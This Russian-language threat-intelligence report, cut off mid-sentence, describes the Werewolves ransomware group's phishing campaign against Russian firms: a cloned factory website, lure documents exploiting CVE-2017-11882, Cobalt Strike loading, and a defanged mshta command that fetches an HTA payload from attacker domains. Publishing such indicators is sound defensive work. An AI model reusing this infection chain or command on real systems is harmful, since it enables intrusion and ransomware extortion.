Werewolves сработали через ru: вымогатели провели новую массовую атаку на российские компании

Специалисты F.A.C.C.T. Threat Intelligence обнаружили новую волну вредоносных рассылок от группы вымогателей Werewolves. Целью новой атаки стали российские промышленные предприятия, телекоммуникационные и IT-компании, финансовые и страховые организации

Группировка Werewolves специализируется на вымогательстве денег с помощью версии программы-вымогателя LockBit3 (Black), собранной на основе появившегося в публичном пространстве билдера. У жертв требуют $130 00 — $1 000 000 за расшифровку и приватность данных. В апреле этого года вымогатели проводили массовые рассылки на тему весеннего призыва и также досудебных претензий. Обычно «оборотни» используют технику двойного давления на жертву: кроме вымогательства за расшифровку данных, злоумышленники выкладывают на сайте информацию о тех, кто отказался платить выкуп.

Перед новой атакой злоумышленники зарегистрировали домен kzst45[.]ru, на котором расположили фейковый сайт одного из российских заводов спецтехники. Они скопировали с помощью программы HTTrack Website Copier содержимое оригинального сайта kzst45[.]com. Отличие — только в доменном имени (у оригинального — .com, у фейкового, появившегося в конце апреля, — .ru):

Сами письма с темами «Досудебная претензия» и «Рекламация» содержали вредоносные вложения, загружающие Cobalt Strike Beacon.

Жертва открывает вложенный документ «Рекламация.doc» (SHA256: da9e7da207a17076785dbe28d6c7922e81d07e84529f80e7a38265c5316fc8d2), который загружает RTF-документ, эксплуатирующий уязвимость CVE-2017-11882.

На устройство жертвы загружается HTA (HTML Application):
mshta https://iplis[.]ru/laydowngrenade.jpeg -> hxxp://vlasta-s[.]ru/logista.hta.

HTA-файл выполняет powershell-команду, в результате которой распаковывается и запускается